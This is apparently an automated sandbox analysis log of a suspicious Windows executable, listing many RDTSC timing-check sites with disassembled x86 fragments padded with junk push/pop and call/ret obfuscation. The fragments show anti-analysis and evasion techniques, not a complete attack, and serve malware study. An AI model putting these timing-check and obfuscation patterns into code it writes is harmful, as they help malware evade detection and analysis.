Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A077F second address: 9A07CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 4DD7EE60h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F1511CE28h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b add dword ptr [ebp+122D1B1Fh], edx 0x00000031 lea ebx, dword ptr [ebp+124525D2h] 0x00000037 or di, 9750h 0x0000003c push eax 0x0000003d pushad 0x0000003e jc 00007F7F1511CE2Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0911 second address: 9A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0915 second address: 9A0976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F7F1511CE34h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jg 00007F7F1511CE30h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 jmp 00007F7F1511CE39h 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0976 second address: 9A097B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A097B second address: 9A0993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 movzx edx, si 0x0000000b lea ebx, dword ptr [ebp+124525DBh] 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0993 second address: 9A0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0999 second address: 9A099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A09FD second address: 9A0A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F147AEA57h 0x0000000f nop 0x00000010 cld 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F7F147AEA48h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jp 00007F7F147AEA49h 0x00000033 push D75099D8h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7F147AEA4Bh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0B2F second address: 9A0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F7F1511CE2Ch 0x0000000f jo 00007F7F1511CE26h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F7F1511CE39h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F7F1511CE31h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0B84 second address: 9A0BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F147AEA4Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0BAB second address: 9A0C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F7F1511CE28h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007F7F1511CE2Bh 0x00000029 lea ebx, dword ptr [ebp+124525E6h] 0x0000002f sbb si, E0C2h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F7F1511CE2Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE59F second address: 9BE5A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5A8 second address: 9BE5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a ja 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5B9 second address: 9BE5CB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5CB second address: 9BE5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE5D1 second address: 9BE5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE74B second address: 9BE74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE74F second address: 9BE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE75E second address: 9BE772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jp 00007F7F1511CE26h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE916 second address: 9BE96C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7F147AEA53h 0x00000010 jp 00007F7F147AEA48h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F7F147AEA58h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BE96C second address: 9BE972 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BED6C second address: 9BED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BED72 second address: 9BED80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BED80 second address: 9BED84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF1AF second address: 9BF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7200 second address: 9B720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F147AEA46h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B720B second address: 9B7214 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF322 second address: 9BF33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA55h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF33C second address: 9BF353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF353 second address: 9BF360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF360 second address: 9BF366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF366 second address: 9BF375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF375 second address: 9BF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F1511CE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9B8 second address: 9BF9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9BE second address: 9BF9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9C4 second address: 9BF9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9C9 second address: 9BF9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9CF second address: 9BF9ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F7F147AEA55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BF9ED second address: 9BFA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F7F1511CE26h 0x00000012 jo 00007F7F1511CE26h 0x00000018 popad 0x00000019 jmp 00007F7F1511CE39h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFA1F second address: 9BFA3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFBB4 second address: 9BFBBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFE8A second address: 9BFE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFE90 second address: 9BFEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F7F1511CE26h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEA0 second address: 9BFEA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEA6 second address: 9BFEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEAC second address: 9BFEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BFEB2 second address: 9BFEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C01BE second address: 9C01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C58C2 second address: 9C58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1511CE2Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7D4C second address: 9C7D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C8195 second address: 9C819A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC577 second address: 9CC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC582 second address: 9CC58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F7F1511CE26h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC58E second address: 9CC594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC720 second address: 9CC728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CC728 second address: 9CC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD133 second address: 9CD139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD208 second address: 9CD20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD20D second address: 9CD271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F7F1511CE2Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 jmp 00007F7F1511CE38h 0x0000001a pop ecx 0x0000001b pop eax 0x0000001c call 00007F7F1511CE2Ah 0x00000021 add di, 37CFh 0x00000026 pop edi 0x00000027 push C4C28538h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7F1511CE32h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD271 second address: 9CD27B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD27B second address: 9CD281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD59E second address: 9CD5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CD842 second address: 9CD847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CDCC4 second address: 9CDCC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CDCC8 second address: 9CDCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE1B9 second address: 9CE1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE27A second address: 9CE284 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE284 second address: 9CE289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE289 second address: 9CE2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7F1511CE30h 0x00000010 jmp 00007F7F1511CE2Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE749 second address: 9CE759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 je 00007F7F147AEA4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF183 second address: 9CF187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF22F second address: 9CF234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CF234 second address: 9CF24A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1511CE28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jl 00007F7F1511CE2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D0DA0 second address: 9D0DAA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2243 second address: 9D226C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F1511CE31h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1F35 second address: 9D1F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D3B second address: 9D2D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D3F second address: 9D2D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D45 second address: 9D2D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D2D5F second address: 9D2DD5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+122D28F6h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7F147AEA48h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jmp 00007F7F147AEA51h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F147AEA48h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xor dword ptr [ebp+122D1CB9h], ebx 0x00000054 push eax 0x00000055 push esi 0x00000056 pushad 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38D3 second address: 9D38DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38DC second address: 9D38EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38EE second address: 9D38F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38F2 second address: 9D38F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D38F8 second address: 9D397C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7F1511CE26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7F1511CE28h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 pushad 0x0000002a pushad 0x0000002b movzx edx, ax 0x0000002e jmp 00007F7F1511CE2Dh 0x00000033 popad 0x00000034 mov edx, ebx 0x00000036 popad 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D2C98h], esi 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F7F1511CE28h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F7F1511CE2Fh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D397C second address: 9D399A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F147AEA54h 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D399A second address: 9D399F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D399F second address: 9D39A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
